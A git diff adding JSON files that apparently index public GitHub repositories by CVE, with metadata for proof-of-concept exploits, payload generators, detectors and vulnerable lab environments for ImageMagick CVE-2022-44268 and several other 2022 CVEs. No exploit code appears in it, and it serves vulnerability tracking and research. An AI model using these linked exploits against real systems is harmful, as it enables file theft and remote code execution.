0000000000..d7f3fe509a --- /dev/null +++ b/2022/CVE-2022-44268.json @@ -0,0 +1,804 @@ +[ + { + "id": 596623131, + "name": "CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC", + "full_name": "duc-nt\/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC", + "owner": { + "login": "duc-nt", + "id": 61867814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61867814?v=4", + "html_url": "https:\/\/github.com\/duc-nt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duc-nt\/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC", + "description": "CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator", + "fork": false, + "created_at": "2023-02-02T15:34:28Z", + "updated_at": "2024-12-30T08:46:43Z", + "pushed_at": "2023-02-02T16:53:37Z", + "stargazers_count": 271, + "watchers_count": 271, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 40, + "watchers": 271, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 596917149, + "name": "CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment", + "full_name": "y1nglamore\/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment", + "owner": { + "login": "y1nglamore", + "id": 46070281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46070281?v=4", + "html_url": "https:\/\/github.com\/y1nglamore", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/y1nglamore\/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment", + "description": "The vulnerable recurrence docker environment for CVE-2022-44268", + "fork": false, + "created_at": "2023-02-03T08:02:28Z", + "updated_at": "2023-05-30T06:56:16Z", + "pushed_at": "2023-02-03T08:03:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 597160092, + "name": "cve-2022-44268", + "full_name": "agathanon\/cve-2022-44268", + "owner": { + "login": "agathanon", + "id": 88989307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88989307?v=4", + "html_url": "https:\/\/github.com\/agathanon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/agathanon\/cve-2022-44268", + "description": "Payload generator and extractor for CVE-2022-44268 written in Python.", + "fork": false, + "created_at": "2023-02-03T19:02:27Z", + "updated_at": "2023-11-07T11:34:49Z", + "pushed_at": "2023-02-03T21:19:31Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 597257490, + "name": "cve-2022-44268-detector", + "full_name": "jnschaeffer\/cve-2022-44268-detector", + "owner": { + "login": "jnschaeffer", + "id": 1588395, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1588395?v=4", + "html_url": "https:\/\/github.com\/jnschaeffer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jnschaeffer\/cve-2022-44268-detector", + "description": "Detect images that likely exploit CVE-2022-44268", + "fork": false, + "created_at": "2023-02-04T01:35:08Z", + "updated_at": "2024-01-14T12:48:26Z", + "pushed_at": "2023-12-06T14:25:00Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-44268", + "imagemagick" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 597283448, + "name": "CVE-2022-44268-automated-poc", + "full_name": "Ashifcoder\/CVE-2022-44268-automated-poc", + "owner": { + "login": "Ashifcoder", + "id": 46344066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46344066?v=4", + "html_url": "https:\/\/github.com\/Ashifcoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ashifcoder\/CVE-2022-44268-automated-poc", + "description": "An information disclosure vulnerability that could be exploited to read arbitrary files from a server when parsing an image in Image Magic.", + "fork": false, + "created_at": "2023-02-04T03:50:07Z", + "updated_at": "2024-03-01T08:40:03Z", + "pushed_at": "2023-02-04T03:50:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 597372793, + "name": "CVE-2022-44268-PoC", + "full_name": "Baikuya\/CVE-2022-44268-PoC", + "owner": { + "login": "Baikuya", + "id": 52155445, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52155445?v=4", + "html_url": "https:\/\/github.com\/Baikuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Baikuya\/CVE-2022-44268-PoC", + "description": "CVE-2022-44268 PoC", + "fork": false, + "created_at": "2023-02-04T10:50:20Z", + "updated_at": "2023-07-16T11:02:28Z", + "pushed_at": "2023-02-04T11:01:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 597824177, + "name": "CVE-2022-44268", + "full_name": "voidz0r\/CVE-2022-44268", + "owner": { + "login": "voidz0r", + "id": 1032286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1032286?v=4", + "html_url": "https:\/\/github.com\/voidz0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/voidz0r\/CVE-2022-44268", + "description": "A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read", + "fork": false, + "created_at": "2023-02-05T18:42:27Z", + "updated_at": "2024-12-13T12:14:00Z", + "pushed_at": "2023-02-05T19:35:03Z", + "stargazers_count": 214, + "watchers_count": 214, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 214, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 598074036, + "name": "imagemagick-lfi-poc", + "full_name": "Sybil-Scan\/imagemagick-lfi-poc", + "owner": { + "login": "Sybil-Scan", + "id": 121743489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121743489?v=4", + "html_url": "https:\/\/github.com\/Sybil-Scan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sybil-Scan\/imagemagick-lfi-poc", + "description": "ImageMagick LFI PoC [CVE-2022-44268]", + "fork": false, + "created_at": "2023-02-06T10:44:43Z", + "updated_at": "2024-10-15T02:57:20Z", + "pushed_at": "2023-11-06T00:38:18Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-44268", + "imagemagick", + "lfi" + ], + "visibility": "public", + "forks": 11, + "watchers": 52, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 598074392, + "name": "imagemagick-CVE-2022-44268", + "full_name": "Vulnmachines\/imagemagick-CVE-2022-44268", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/imagemagick-CVE-2022-44268", + "description": "Imagemagick CVE-2022-44268", + "fork": false, + "created_at": "2023-02-06T10:45:42Z", + "updated_at": "2024-11-13T20:59:34Z", + "pushed_at": "2023-02-06T10:51:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 600932755, + "name": "CVE-2022-44268", + "full_name": "kljunowsky\/CVE-2022-44268", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-44268", + "description": "CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit", + "fork": false, + "created_at": "2023-02-13T02:00:51Z", + "updated_at": "2024-10-28T05:08:08Z", + "pushed_at": "2023-12-29T14:53:55Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "applicati", + "bugbounty", + "bugbounty-tool", + "bugbountytips", + "cve-2022-44268", + "exploit", + "penetration-testing", + "penetration-testing-tools", + "proof-of-concept", + "security", + "web", + "webapplicationhacking" + ], + "visibility": "public", + "forks": 7, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604397718, + "name": "heroku-CVE-2022-44268-reproduction", + "full_name": "nfm\/heroku-CVE-2022-44268-reproduction", + "owner": { + "login": "nfm", + "id": 127960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127960?v=4", + "html_url": "https:\/\/github.com\/nfm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nfm\/heroku-CVE-2022-44268-reproduction", + "description": null, + "fork": false, + "created_at": "2023-02-21T01:15:07Z", + "updated_at": "2023-02-21T02:02:09Z", + "pushed_at": "2023-02-21T04:03:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 617667621, + "name": "POC-CVE-2022-44268", + "full_name": "betillogalvanfbc\/POC-CVE-2022-44268", + "owner": { + "login": "betillogalvanfbc", + "id": 45644724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45644724?v=4", + "html_url": "https:\/\/github.com\/betillogalvanfbc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/betillogalvanfbc\/POC-CVE-2022-44268", + "description": null, + "fork": false, + "created_at": "2023-03-22T21:26:20Z", + "updated_at": "2023-03-23T05:43:33Z", + "pushed_at": "2023-03-22T21:26:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 658471431, + "name": "CVE-2022-44268-MagiLeak", + "full_name": "adhikara13\/CVE-2022-44268-MagiLeak", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2022-44268-MagiLeak", + "description": "Tools for working with ImageMagick to handle arbitrary file read vulnerabilities. Generate, read, and apply profile information to PNG files using a command-line interface.", + "fork": false, + "created_at": "2023-06-25T20:52:57Z", + "updated_at": "2023-06-27T09:57:01Z", + "pushed_at": "2023-06-26T18:16:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 661387078, + "name": "CVE-2022-44268-Exploit", + "full_name": "bhavikmalhotra\/CVE-2022-44268-Exploit", + "owner": { + "login": "bhavikmalhotra", + "id": 65305368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65305368?v=4", + "html_url": "https:\/\/github.com\/bhavikmalhotra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bhavikmalhotra\/CVE-2022-44268-Exploit", + "description": "Expoit for CVE-2022-44268", + "fork": false, + "created_at": "2023-07-02T17:24:00Z", + "updated_at": "2023-07-02T18:46:00Z", + "pushed_at": "2023-07-02T17:28:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 661819238, + "name": "CVE-2022-44268", + "full_name": "entr0pie\/CVE-2022-44268", + "owner": { + "login": "entr0pie", + "id": 73120825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73120825?v=4", + "html_url": "https:\/\/github.com\/entr0pie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/entr0pie\/CVE-2022-44268", + "description": "PoC of Imagemagick's Arbitrary File Read", + "fork": false, + "created_at": "2023-07-03T18:13:44Z", + "updated_at": "2024-07-21T00:04:34Z", + "pushed_at": "2023-07-03T18:34:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 666508345, + "name": "cve-2022-44268", + "full_name": "Pog-Frog\/cve-2022-44268", + "owner": { + "login": "Pog-Frog", + "id": 60003686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60003686?v=4", + "html_url": "https:\/\/github.com\/Pog-Frog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pog-Frog\/cve-2022-44268", + "description": null, + "fork": false, + "created_at": "2023-07-14T17:46:15Z", + "updated_at": "2023-07-14T17:46:23Z", + "pushed_at": "2023-07-14T17:46:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667601703, + "name": "auto-cve-2022-44268.sh", + "full_name": "narekkay\/auto-cve-2022-44268.sh", + "owner": { + "login": "narekkay", + "id": 24856100, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24856100?v=4", + "html_url": "https:\/\/github.com\/narekkay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/narekkay\/auto-cve-2022-44268.sh", + "description": "Automating Exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read", + "fork": false, + "created_at": "2023-07-17T22:21:33Z", + "updated_at": "2024-07-10T02:01:58Z", + "pushed_at": "2023-07-18T01:11:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 669707422, + "name": "ImageMagick-lfi-poc", + "full_name": "fanbyprinciple\/ImageMagick-lfi-poc", + "owner": { + "login": "fanbyprinciple", + "id": 29324589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29324589?v=4", + "html_url": "https:\/\/github.com\/fanbyprinciple", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fanbyprinciple\/ImageMagick-lfi-poc", + "description": "ImageMagick Arbitrary Read Files - CVE-2022-44268", + "fork": false, + "created_at": "2023-07-23T06:56:59Z", + "updated_at": "2023-12-07T00:07:54Z", + "pushed_at": "2023-07-24T04:25:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-44268", + "hackthebox", + "htb", + "imagemagick", + "imageupload", + "lfi" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 677919510, + "name": "CVE-2022-44268_By_Kyokito", + "full_name": "chairat095\/CVE-2022-44268_By_Kyokito", + "owner": { + "login": "chairat095", + "id": 44226708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44226708?v=4", + "html_url": "https:\/\/github.com\/chairat095", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chairat095\/CVE-2022-44268_By_Kyokito", + "description": "CVE-2022-44268_By_Kyokito", + "fork": false, + "created_at": "2023-08-13T04:43:12Z", + "updated_at": "2023-08-14T01:11:30Z", + "pushed_at": "2023-08-13T04:44:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 687632513, + "name": "Exploit-for-ImageMagick-CVE-2022-44268", + "full_name": "atici\/Exploit-for-ImageMagick-CVE-2022-44268", + "owner": { + "login": "atici", + "id": 68865673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68865673?v=4", + "html_url": "https:\/\/github.com\/atici", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/atici\/Exploit-for-ImageMagick-CVE-2022-44268", + "description": "A bash script for easyly exploiting ImageMagick Arbitrary File Read Vulnerability CVE-2022-44268", + "fork": false, + "created_at": "2023-09-05T17:16:06Z", + "updated_at": "2023-09-05T19:52:12Z", + "pushed_at": "2023-09-05T18:57:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704595452, + "name": "IMAGE-MAGICK-CVE-2022-44268", + "full_name": "Vagebondcur\/IMAGE-MAGICK-CVE-2022-44268", + "owner": { + "login": "Vagebondcur", + "id": 103751916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103751916?v=4", + "html_url": "https:\/\/github.com\/Vagebondcur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vagebondcur\/IMAGE-MAGICK-CVE-2022-44268", + "description": null, + "fork": false, + "created_at": "2023-10-13T15:43:49Z", + "updated_at": "2023-10-13T15:49:04Z", + "pushed_at": "2023-10-13T15:49:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 718826402, + "name": "-CVE-2022-44268", + "full_name": "NataliSemi\/-CVE-2022-44268", + "owner": { + "login": "NataliSemi", + "id": 43733113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43733113?v=4", + "html_url": "https:\/\/github.com\/NataliSemi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NataliSemi\/-CVE-2022-44268", + "description": null, + "fork": false, + "created_at": "2023-11-14T21:54:17Z", + "updated_at": "2023-11-14T22:02:19Z", + "pushed_at": "2023-11-16T23:00:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 727130787, + "name": "CVE-2022-44268-fixed-PoC", + "full_name": "CygnusX-26\/CVE-2022-44268-fixed-PoC", + "owner": { + "login": "CygnusX-26", + "id": 42686923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42686923?v=4", + "html_url": "https:\/\/github.com\/CygnusX-26", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CygnusX-26\/CVE-2022-44268-fixed-PoC", + "description": null, + "fork": false, + "created_at": "2023-12-04T08:48:28Z", + "updated_at": "2023-12-04T08:48:34Z", + "pushed_at": "2023-12-04T08:48:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848769776, + "name": "CVE-2022-44268-automated", + "full_name": "PanAdamski\/CVE-2022-44268-automated", + "owner": { + "login": "PanAdamski", + "id": 108422861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108422861?v=4", + "html_url": "https:\/\/github.com\/PanAdamski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PanAdamski\/CVE-2022-44268-automated", + "description": null, + "fork": false, + "created_at": "2024-08-28T11:28:34Z", + "updated_at": "2024-08-29T02:03:02Z", + "pushed_at": "2024-08-28T11:37:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851015122, + "name": "CVE-2022-44268", + "full_name": "FlojBoj\/CVE-2022-44268", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2022-44268", + "description": "ImageMagick 7.1.0-49 vulnerable to Information Disclosure", + "fork": false, + "created_at": "2024-09-02T09:11:45Z", + "updated_at": "2024-09-02T09:56:19Z", + "pushed_at": "2024-09-02T09:56:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44276.json b/2022/CVE-2022-44276.json new file mode 100644 index 0000000000..a543829d11 --- /dev/null +++ b/2022/CVE-2022-44276.json @@ -0,0 +1,33 @@ +[ + { + "id": 658104709, + "name": "CVE-2022-44276-PoC", + "full_name": "HerrLeStrate\/CVE-2022-44276-PoC", + "owner": { + "login": "HerrLeStrate", + "id": 26091132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26091132?v=4", + "html_url": "https:\/\/github.com\/HerrLeStrate", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HerrLeStrate\/CVE-2022-44276-PoC", + "description": "PoC for Responsive Filemanager < 9.12.0 bypass upload restrictions lead to RCE", + "fork": false, + "created_at": "2023-06-24T19:28:44Z", + "updated_at": "2023-06-24T19:28:44Z", + "pushed_at": "2023-06-25T09:19:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44311.json b/2022/CVE-2022-44311.json new file mode 100644 index 0000000000..9763a5a4e1 --- /dev/null +++ b/2022/CVE-2022-44311.json @@ -0,0 +1,69 @@ +[ + { + "id": 595851923, + "name": "CVE-2022-44311", + "full_name": "Halcy0nic\/CVE-2022-44311", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-44311", + "description": "Proof of concept for CVE-2022-44311", + "fork": false, + "created_at": "2023-01-31T23:53:39Z", + "updated_at": "2024-07-02T20:34:18Z", + "pushed_at": "2023-02-01T00:32:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603938610, + "name": "CVE-2022-44311", + "full_name": "DesmondSanctity\/CVE-2022-44311", + "owner": { + "login": "DesmondSanctity", + "id": 51109125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51109125?v=4", + "html_url": "https:\/\/github.com\/DesmondSanctity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DesmondSanctity\/CVE-2022-44311", + "description": "Out-Of-Bounds Read in html2xhtml : CVE-2022-44311", + "fork": false, + "created_at": "2023-02-20T01:28:04Z", + "updated_at": "2023-03-17T15:48:31Z", + "pushed_at": "2023-02-21T01:55:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "security", + "vulnerabilities", + "vulnerability-assessment" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44312.json b/2022/CVE-2022-44312.json new file mode 100644 index 0000000000..1a9278d3a1 --- /dev/null +++ b/2022/CVE-2022-44312.json @@ -0,0 +1,33 @@ +[ + { + "id": 657382893, + "name": "CVEs-for-picoc-3.2.2", + "full_name": "Halcy0nic\/CVEs-for-picoc-3.2.2", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVEs-for-picoc-3.2.2", + "description": "Reproduction files for CVE-2022-44312 through CVE-2022-44321", + "fork": false, + "created_at": "2023-06-23T00:16:52Z", + "updated_at": "2024-07-02T20:33:00Z", + "pushed_at": "2023-08-14T01:35:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44318.json b/2022/CVE-2022-44318.json new file mode 100644 index 0000000000..e843f5b469 --- /dev/null +++ b/2022/CVE-2022-44318.json @@ -0,0 +1,33 @@ +[ + { + "id": 595867993, + "name": "CVE-2022-44318", + "full_name": "Halcy0nic\/CVE-2022-44318", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-44318", + "description": "Proof of concept for CVE-2022-44318", + "fork": false, + "created_at": "2023-02-01T01:00:33Z", + "updated_at": "2024-07-02T20:33:56Z", + "pushed_at": "2023-02-01T01:13:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44569.json b/2022/CVE-2022-44569.json new file mode 100644 index 0000000000..285cfa3788 --- /dev/null +++ b/2022/CVE-2022-44569.json @@ -0,0 +1,33 @@ +[ + { + "id": 797754300, + "name": "ivanti-automationmanager-exploit", + "full_name": "rweijnen\/ivanti-automationmanager-exploit", + "owner": { + "login": "rweijnen", + "id": 7575747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7575747?v=4", + "html_url": "https:\/\/github.com\/rweijnen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rweijnen\/ivanti-automationmanager-exploit", + "description": "Exploit for Ivanti Automation Manager CVE-2022-44569", + "fork": false, + "created_at": "2024-05-08T13:00:16Z", + "updated_at": "2024-05-08T20:41:45Z", + "pushed_at": "2024-05-08T13:26:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44666.json b/2022/CVE-2022-44666.json new file mode 100644 index 0000000000..dd1f33f9bc --- /dev/null +++ b/2022/CVE-2022-44666.json @@ -0,0 +1,33 @@ +[ + { + "id": 602207436, + "name": "CVE-2022-44666", + "full_name": "j00sean\/CVE-2022-44666", + "owner": { + "login": "j00sean", + "id": 22483317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22483317?v=4", + "html_url": "https:\/\/github.com\/j00sean", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j00sean\/CVE-2022-44666", + "description": "Write-up for another forgotten Windows vulnerability (0day): Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape, which was not fully fixed as CVE-2022-44666 in the patches released on December, 2022.", + "fork": false, + "created_at": 